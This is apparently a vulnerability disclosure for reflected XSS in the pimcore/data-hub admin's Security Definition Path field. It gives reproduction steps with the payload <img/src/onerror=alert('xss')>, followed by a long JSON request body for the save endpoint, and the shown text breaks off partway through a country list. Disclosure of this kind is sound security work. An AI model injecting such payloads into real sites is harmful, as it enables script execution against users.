Cross-site Scripting (XSS) - Reflected in pimcore/data-hub

Valid

Reported on

Jan 21st 2022


Description

Pimcore Datahub is vulnerable to reflected XSS via the Path field of the Documents, Assets and Objects sections in the Security Definition tab.

Steps to reproduce

1. Go to https://demo.pimcore.fun/admin/ and log in.
2. In the left menu bar, click the Datahub icon, open any existing configuration, then go to the Security Definition tab.
3. In the Security Definition tab, click the Add button in the Path field of Documents, Assets or Objects and enter the payload <img/src/onerror=alert('xss')>
4. Click the Save button; the XSS popup is triggered.

POST request endpoint

/admin/pimcoredatahub/config/save

POST JSON body (as sent by the Save action)

{"general":{"active":true,"type":"GraphQL","name":"shop","description":"Shop related information like Orders, OrderItems, Vouchers.","group":"","sqlObjectCondition":""},"schema":{"queryEntities":[{"id":"OnlineShopOrder","name":"OnlineShopOrder","columnConfig":{"columns":[{"attributes":{"attribute":"ordernumber","label":"Ordernumber","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"ordernumber","title":"Ordernumber","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"orderState","label":"OrderState","dataType":"select","layout":{"fieldtype":"select","options":[{"key":"Committed","value":"committed"},{"key":"Cancelled","value":"cancelled"},{"key":"Payment 
Pending","value":"paymentPending"},{"key":"Aborted","value":"aborted"}],"width":400,"defaultValue":"","optionsProviderClass":"","optionsProviderData":"","queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","dynamicOptions":false,"name":"orderState","title":"OrderState","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"orderdate","label":"Orderdate","dataType":"datetime","layout":{"fieldtype":"datetime","queryColumnType":"bigint(20)","columnType":"bigint(20)","phpdocType":"\\Carbon\\Carbon","defaultValue":null,"useCurrentDate":false,"name":"orderdate","title":"Orderdate","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"items","label":"Items","dataType":"manyToManyObjectRelation","layout":{"fieldtype":"manyToManyObjectRelation","width":"","height":"","maxItems":"","queryColumnType":"text","phpdocType":"array","relationType":true,"visibleFields":null,"optimizedAdminLoading":false,"visibleFieldDefinitions":[],"lazyLoading":false,"classes":[{"classes":"OnlineShopOrderItem"}],"pathFormatterClass":"","name":"items","title":"Items","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"comment","label":"Comment","dataType":"textarea","layout":{"fieldtype":"textarea","width":400,"height":200,"maxLength":null,"showCharCount":null,"excludeFromSearchIndex":false,"queryColumnType":"longtext","columnType":"longtext","phpdocType":"string","name":"comm
ent","title":"Comment","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"customerOrderData","label":"Customer Order Data","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"customerOrderData","title":"Customer Order Data","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"voucherTokens","label":"Voucher Tokens","dataType":"manyToManyObjectRelation","layout":{"fieldtype":"manyToManyObjectRelation","width":"","height":"","maxItems":"","queryColumnType":"text","phpdocType":"array","relationType":true,"visibleFields":null,"optimizedAdminLoading":false,"visibleFieldDefinitions":[],"lazyLoading":false,"classes":[{"classes":"OnlineShopVoucherToken"}],"pathFormatterClass":null,"name":"voucherTokens","title":"Voucher Tokens","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"giftItems","label":"Gift Items","dataType":"manyToManyObjectRelation","layout":{"fieldtype":"manyToManyObjectRelation","width":"","height":"","maxItems":"","queryColumnType":"text","phpdocType":"array","relationType":true,"visibleFields":null,"optimizedAdminLoading":false,"visibleFieldDefinitions":[],"lazyLoading":true,"classes":[{"classes":"OnlineShopOrderItem"}],"pathFormatterClass":"","name":"giftItems","title":"Gift 
Items","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"subTotalNetPrice","label":"SubTotalNetPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"subTotalNetPrice","title":"SubTotalNetPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"subTotalPrice","label":"SubTotalPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"subTotalPrice","title":"SubTotalPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"totalNetPrice","label":"TotalNetPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"totalNetPrice","title":"TotalNetPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":fa
lse,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"totalPrice","label":"TotalPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"totalPrice","title":"TotalPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"currency","label":"Currency","dataType":"input","layout":{"fieldtype":"input","width":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"currency","title":"Currency","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"customer","label":"Customer","dataType":"manyToOneRelation","layout":{"fieldtype":"manyToOneRelation","width":400,"assetUploadPath":"","relationType":true,"queryColumnType":{"id":"int(11)","type":"enum('document','asset','object')"},"phpdocType":"\\Pimcore\\Model\\Document\\Page | \\Pimcore\\Model\\Document\\Snippet | \\Pimcore\\Model\\Document | \\Pimcore\\Model\\Asset | 
\\Pimcore\\Model\\DataObject\\AbstractObject","objectsAllowed":true,"assetsAllowed":false,"assetTypes":[],"documentsAllowed":false,"documentTypes":[],"lazyLoading":true,"classes":[{"classes":"Customer"}],"pathFormatterClass":"","name":"customer","title":"Customer","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryFirstname","label":"Firstname","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryFirstname","title":"Firstname","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryLastname","label":"Lastname","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryLastname","title":"Lastname","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryCompany","label":"Company","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryCompany","title":"Company","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data",
"relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryStreet","label":"Street","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryStreet","title":"Street","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryZip","label":"Zip","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryZip","title":"Zip","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryCity","label":"City","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryCity","title":"City","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"paymentInfo","label":"Payment 
Informations","dataType":"fieldcollections","layout":{"fieldtype":"fieldcollections","phpdocType":"\\Pimcore\\Model\\DataObject\\Fieldcollection","allowedTypes":["PaymentInfo"],"lazyLoading":false,"maxItems":"","disallowAddRemove":true,"disallowReorder":true,"collapsed":false,"collapsible":false,"border":false,"name":"paymentInfo","title":"Payment Informations","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"paymentReference","label":"Payment Ref.","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"paymentReference","title":"Payment Ref.","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}},{"id":"OnlineShopOrderItem","name":"OnlineShopOrderItem","columnConfig":{"columns":[{"attributes":{"attribute":"orderState","label":"Order Item State","dataType":"select","layout":{"fieldtype":"select","options":[{"key":"Committed","value":"committed"},{"key":"Cancelled","value":"cancelled"}],"width":400,"defaultValue":"","optionsProviderClass":null,"optionsProviderData":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","dynamicOptions":false,"name":"orderState","title":"Order Item 
State","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"productNumber","label":"Produktnummer","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"productNumber","title":"Produktnummer","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"productName","label":"Produktname","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"productName","title":"Produktname","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"amount","label":"Amount","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":false,"decimalSize":null,"decimalPrecision":null,"name":"amount","title":"Amount","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"totalNetPrice","label":"NetPrice","dataType":"numeric"
,"layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":null,"decimalPrecision":null,"name":"totalNetPrice","title":"NetPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"totalPrice","label":"Price","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":null,"decimalPrecision":null,"name":"totalPrice","title":"Price","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"pricingRules","label":"Pricing Rules","dataType":"fieldcollections","layout":{"fieldtype":"fieldcollections","phpdocType":"\\Pimcore\\Model\\DataObject\\Fieldcollection","allowedTypes":["PricingRule"],"lazyLoading":true,"maxItems":"","disallowAddRemove":false,"disallowReorder":false,"collapsed":false,"collapsible":false,"border":false,"name":"pricingRules","title":"Pricing 
Rules","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"comment","label":"Comment","dataType":"textarea","layout":{"fieldtype":"textarea","width":400,"height":"","maxLength":null,"showCharCount":null,"excludeFromSearchIndex":false,"queryColumnType":"longtext","columnType":"longtext","phpdocType":"string","name":"comment","title":"Comment","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}},{"id":"OnlineShopVoucherToken","name":"OnlineShopVoucherToken","columnConfig":{"columns":[{"attributes":{"attribute":"tokenId","label":"Token ID","dataType":"numeric","layout":{"fieldtype":"numeric","width":500,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":false,"decimalSize":null,"decimalPrecision":null,"name":"tokenId","title":"Token 
ID","tooltip":"","mandatory":true,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"token","label":"Token","dataType":"input","layout":{"fieldtype":"input","width":500,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"token","title":"Token","tooltip":"","mandatory":true,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"voucherSeries","label":"Voucher Series","dataType":"manyToOneRelation","layout":{"fieldtype":"manyToOneRelation","width":500,"assetUploadPath":"","relationType":true,"queryColumnType":{"id":"int(11)","type":"enum('document','asset','object')"},"phpdocType":"\\Pimcore\\Model\\Document\\Page | \\Pimcore\\Model\\Document\\Snippet | \\Pimcore\\Model\\Document | \\Pimcore\\Model\\Asset | \\Pimcore\\Model\\DataObject\\AbstractObject","objectsAllowed":true,"assetsAllowed":false,"assetTypes":[],"documentsAllowed":false,"documentTypes":[],"lazyLoading":false,"classes":[{"classes":"OnlineShopVoucherSeries"}],"pathFormatterClass":null,"name":"voucherSeries","title":"Voucher 
Series","tooltip":"","mandatory":true,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}},{"id":"Customer","name":"Customer","columnConfig":{"columns":[{"attributes":{"attribute":"gender","label":"Gender","dataType":"gender","layout":{"fieldtype":"gender","options":[{"key":"male","value":"male"},{"key":"female","value":"female"},{"key":"","value":"unknown"}],"width":"","defaultValue":null,"optionsProviderClass":null,"optionsProviderData":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":"190","phpdocType":"string","dynamicOptions":false,"name":"gender","title":"Gender","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"firstname","label":"Firstname","dataType":"firstname","layout":{"fieldtype":"firstname","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"firstname","title":"Firstname","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"lastname","label":"Lastname","dataType":"lastname","layout":{"fieldtype":"lastname","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"lastname","title":"Lastname","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visible
Search":true}},"isOperator":false},{"attributes":{"attribute":"company","label":"Company","dataType":"input","layout":{"fieldtype":"input","width":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"company","title":"Company","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"email","label":"Email","dataType":"email","layout":{"fieldtype":"email","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"email","title":"Email","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"street","label":"Street","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"street","title":"Street","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"zip","label":"Zip","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"zip","title":"Zip","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data",
"relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"countryCode","label":"Country","dataType":"country","layout":{"fieldtype":"country","restrictTo":"","options":[{"key":"Afghanistan","value":"AF"},{"key":"Albania","value":"AL"},{"key":"Algeria","value":"DZ"},{"key":"American Samoa","value":"AS"},{"key":"Andorra","value":"AD"},{"key":"Angola","value":"AO"},{"key":"Anguilla","value":"AI"},{"key":"Antigua and Barbuda","value":"AG"},{"key":"Argentina","value":"AR"},{"key":"Armenia","value":"AM"},{"key":"Aruba","value":"AW"},{"key":"Australia","value":"AU"},{"key":"Austria","value":"AT"},{"key":"Azerbaijan","value":"AZ"},{"key":"Bahamas","value":"BS"},{"key":"Bahrain","value":"BH"},{"key":"Bangladesh","value":"BD"},{"key":"Barbados","value":"BB"},{"key":"Belarus","value":"BY"},{"key":"Belgium","value":"BE"},{"key":"Belize","value":"BZ"},{"key":"Benin","value":"BJ"},{"key":"Bermuda","value":"BM"},{"key":"Bhutan","value":"BT"},{"key":"Bolivia","value":"BO"},{"key":"Bosnia and Herzegovina","value":"BA"},{"key":"Botswana","value":"BW"},{"key":"Brazil","value":"BR"},{"key":"British Indian Ocean Territory","value":"IO"},{"key":"British Virgin Islands","value":"VG"},{"key":"Brunei","value":"BN"},{"key":"Bulgaria","value":"BG"},{"key":"Burkina Faso","value":"BF"},{"key":"Burundi","value":"BI"},{"key":"Cambodia","value":"KH"},{"key":"Cameroon","value":"CM"},{"key":"Canada","value":"CA"},{"key":"Canary Islands","value":"IC"},{"key":"Cape Verde","value":"CV"},{"key":"Caribbean Netherlands","value":"BQ"},{"key":"Cayman Islands","value":"KY"},{"key":"Central African Republic","value":"CF"},{"key":"Ceuta and Melilla","value":"EA"},{"key":"Chad","value":"TD"},{"key":"Chile","value":"CL"},{"key":"China","value":"CN"},{"key":"Christmas Island","value":"CX"},{"key":"Cocos (Keeling) Islands","value":"CC"},{"key":"Colombia","value":"CO"},{"key":"Comoros","value":"KM"},{"key":"Congo - 
Brazzaville","value":"CG"},{"key":"Congo - Kinshasa","value":"CD"},{"key":"Cook Islands","value":"CK"},{"key":"Costa Rica","value":"CR"},{"key":"Croatia","value":"HR"},{"key":"Cuba","value":"CU"},{"key":"Curaçao","value":"CW"},{"key":"Cyprus","value":"CY"},{"key":"Czech Republic","value":"CZ"},{"key":"Côte d’Ivoire","value":"CI"},{"key":"Denmark","value":"DK"},{"key":"Diego Garcia","value":"DG"},{"key":"Djibouti","value":"DJ"},{"key":"Dominica","value":"DM"},{"key":"Dominican Republic","value":"DO"},{"key":"Ecuador","value":"EC"},{"key":"Egypt","value":"EG"},{"key":"El Salvador","value":"SV"},{"key":"Equatorial Guinea","value":"GQ"},{"key":"Eritrea","value":"ER"},{"key":"Estonia","value":"EE"},{"key":"Ethiopia","value":"ET"},{"key":"Falkland Islands","value":"FK"},{"key":"Faroe Islands","value":"FO"},{"key":"Fiji","value":"FJ"},{"key":"Finland","value":"FI"},{"key":"France","value":"FR"},{"key":"French Guiana","value":"GF"},{"key":"French Polynesia","value":"PF"},{"key":"Gabon","value":"GA"},{"key":"Gambia","value":"GM"},{"key":"Georgia","value":"GE"},{"key":"Germany","value":"DE"},{"key":"Ghana","value":"GH"},{"key":"Gibraltar","value":"GI"},{"key":"Greece","value":"GR"},{"key":"Greenland","value":"GL"},{"key":"Grenada","value":"GD"},{"key":"Guadeloupe","value":"GP"},{"key":"Guam","value":"GU"},{"key":"Guatemala","value":"GT"},{"key":"Guernsey","value":"GG"},{"key":"Guinea","value":"GN"},{"key":"Guinea-Bissau","value":"GW"},{"key":"Guyana","value":"GY"},{"key":"Haiti","value":"HT"},{"key":"Honduras","value":"HN"},{"key":"Hong Kong SAR China","value":"HK"},{"key":"Hungary","value":"HU"},{"key":"Iceland","value":"IS"},{"key":"India","value":"IN"},{"key":"Indonesia","value":"ID"},{"key":"Iran","value":"IR"},{"key":"Iraq","value":"IQ"},{"key":"Ireland","value":"IE"},{"key":"Isle of 
Man","value":"IM"},{"key":"Israel","value":"IL"},{"key":"Italy","value":"IT"},{"key":"Jamaica","value":"JM"},{"key":"Japan","value":"JP"},{"key":"Jersey","value":"JE"},{"key":"Jordan","value":"JO"},{"key":"Kazakhstan","value":"KZ"},{"key":"Kenya","value":"KE"},{"key":"Kiribati","value":"KI"},{"key":"Kosovo","value":"XK"},{"key":"Kuwait","value":"KW"},{"key":"Kyrgyzstan","value":"KG"},{"key":"Laos","value":"LA"},{"key":"Latvia","value":"LV"},{"key":"Lebanon","value":"LB"},{"key":"Lesotho","value":"LS"},{"key":"Liberia","value":"LR"},{"key":"Libya","value":"LY"},{"key":"Liechtenstein","value":"LI"},{"key":"Lithuania","value":"LT"},{"key":"Luxembourg","value":"LU"},{"key":"Macau SAR China","value":"MO"},{"key":"Macedonia","value":"MK"},{"key":"Madagascar","value":"MG"},{"key":"Malawi","value":"MW"},{"key":"Malaysia","value":"MY"},{"key":"Mali","value":"ML"},{"key":"Malta","value":"MT"},{"key":"Marshall Islands","value":"MH"},{"key":"Martinique","value":"MQ"},{"key":"Mauritania","value":"MR"},{"key":"Mauritius","value":"MU"},{"key":"Mayotte","value":"YT"},{"key":"Mexico","value":"MX"},{"key":"Micronesia","value":"FM"},{"key":"Moldova","value":"MD"},{"key":"Monaco","value":"MC"},{"key":"Mongolia","value":"MN"},{"key":"Montenegro","value":"ME"},{"key":"Montserrat","value":"MS"},{"key":"Morocco","value":"MA"},{"key":"Mozambique","value":"MZ"},{"key":"Myanmar (Burma)","value":"MM"},{"key":"Namibia","value":"NA"},{"key":"Nauru","value":"NR"},{"key":"Nepal","value":"NP"},{"key":"Netherlands","value":"NL"},{"key":"New Caledonia","value":"NC"},{"key":"New Zealand","value":"NZ"},{"key":"Nicaragua","value":"NI"},{"key":"Niger","value":"NE"},{"key":"Nigeria","value":"NG"},{"key":"Niue","value":"NU"},{"key":"Norfolk Island","value":"NF"},{"key":"North Korea","value":"KP"},{"key":"Northern Mariana Islands","value":"MP"},{"key":"Norway","value":"NO"},{"key":"Oman","value":"OM"},{"key":"Pakistan","value":"PK"},{"key":"Palau","value":"PW"},{"key":"Palestinian 
Territories","value":"PS"},{"key":"Panama","value":"PA"},{"key":"Papua New Guinea","value":"PG"},{"key":"Paraguay","value":"PY"},{"key":"Peru","value":"PE"},{"key":"Philippines","value":"PH"},{"key":"Pitcairn Islands","value":"PN"},{"key":"Poland","value":"PL"},{"key":"Portugal","value":"PT"},{"key":"Puerto Rico","value":"PR"},{"key":"Qatar","value":"QA"},{"key":"Romania","value":"RO"},{"key":"Russia","value":"RU"},{"key":"Rwanda","value":"RW"},{"key":"Réunion","value":"RE"},{"key":"Saint Barthélemy","value":"BL"},{"key":"Saint Helena","value":"SH"},{"key":"Saint Kitts and Nevis","value":"KN"},{"key":"Saint Lucia","value":"LC"},{"key":"Saint Martin","value":"MF"},{"key":"Saint Pierre and Miquelon","value":"PM"},{"key":"Samoa","value":"WS"},{"key":"San Marino","value":"SM"},{"key":"Saudi Arabia","value":"SA"},{"key":"Senegal","value":"SN"},{"key":"Serbia","value":"RS"},{"key":"Seychelles","value":"SC"},{"key":"Sierra Leone","value":"SL"},{"key":"Singapore","value":"SG"},{"key":"Sint Maarten","value":"SX"},{"key":"Slovakia","value":"SK"},{"key":"Slovenia","value":"SI"},{"key":"Solomon Islands","value":"SB"},{"key":"Somalia","value":"SO"},{"key":"South Africa","value":"ZA"},{"key":"South Korea","value":"KR"},{"key":"South Sudan","value":"SS"},{"key":"Spain","value":"ES"},{"key":"Sri Lanka","value":"LK"},{"key":"St. 
